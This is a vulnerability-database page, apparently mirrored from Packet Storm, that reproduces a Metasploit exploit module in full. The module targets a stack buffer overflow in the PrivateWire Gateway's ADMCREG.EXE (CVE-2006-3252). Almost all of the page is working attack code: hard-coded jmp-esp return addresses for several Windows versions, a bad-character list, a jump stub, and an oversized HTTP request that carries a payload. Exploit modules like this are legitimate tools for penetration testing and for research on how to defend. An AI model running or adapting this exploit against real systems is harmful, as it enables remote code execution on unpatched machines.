Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMichael ThumannPACKETSTORM:82976
HistoryNov 26, 2009 - 12:00 a.m.

Private Wire Gateway Buffer Overflow

2009-11-2600:00:00
Michael Thumann
packetstormsecurity.com
23

0.955 High

EPSS

Percentile

99.4%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
# This file may only be distributed as part of the Metasploit Framework.  
# Any other use needs a written permission from the author.  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Private Wire Gateway Buffer Overflow',  
'Description' => %q{  
This exploits a buffer overflow in the ADMCREG.EXE used  
in the PrivateWire Online Registration Facility.  
},  
'Author' => 'Michael Thumann <mthumann[at]ernw.de>',  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
['CVE', '2006-3252'],  
['OSVDB', '26861'],  
['BID', '18647'],  
],  
'Payload' =>  
{  
'Space' => 8000,  
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x1b",  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>   
[  
['Windows 2000 English SP0', { 'Ret' => 0x77e3c289 }], # jmp esp user32.dll  
['Windows 2000 English SP1', { 'Ret' => 0x77e3cb4c }], # jmp esp user32.dll  
['Windows 2000 English SP2', { 'Ret' => 0x77e3af64 }], # jmp esp user32.dll  
['Windows 2000 English SP3', { 'Ret' => 0x77e388a7 }], # jmp esp user32.dll  
['Windows 2000 English SP4', { 'Ret' => 0x77e3c256 }], # jmp esp user32.dll  
['Windows 2003 English SP0/SP1', { 'Ret' => 0x77d74c94 }], # jmp esp user32.dll  
['Debugging', { 'Ret' => 0x41414141 }], # crash  
],   
'DefaultTarget' => 4,  
'DisclosureDate' => 'Jun 26 2006'))  
  
register_options(   
[   
OptString.new('PATH', [ true, "Installation path of Privatewire", 'C:\Cipgw' ])  
], self.class)  
end  
  
def exploit  
# add 25 to ecx and jmp  
jmp = "\x6a\x19\x58\x01\xc1\xff\xe1"  
  
path_offset = datastore['PATH'].length - 8  
  
pattern = rand_text_alphanumeric(8192)  
pattern[0, payload.encoded.length] = payload.encoded  
pattern[8156 - path_offset, 4] = [target.ret].pack('V')  
pattern[8160, jmp.length] = jmp  
  
print_status("Trying #{target.name} using jmp esp at #{"%.8x" % target.ret}")  
  
send_request_raw({  
'uri' => "/" + pattern  
}, 2)  
end  
  
end  
`

Related

nvd 1
cvelist 1
cve 1
nvd
nvd
CVE-2006-3252
2006-06-27 18:05:00
cvelist
cvelist
CVE-2006-3252
2006-06-27 18:00:00
cve
cve
CVE-2006-3252
2006-06-27 18:05:00

0.955 High

EPSS

Percentile

99.4%

JSON
Related for PACKETSTORM:82976
nvd1cvelist1cve1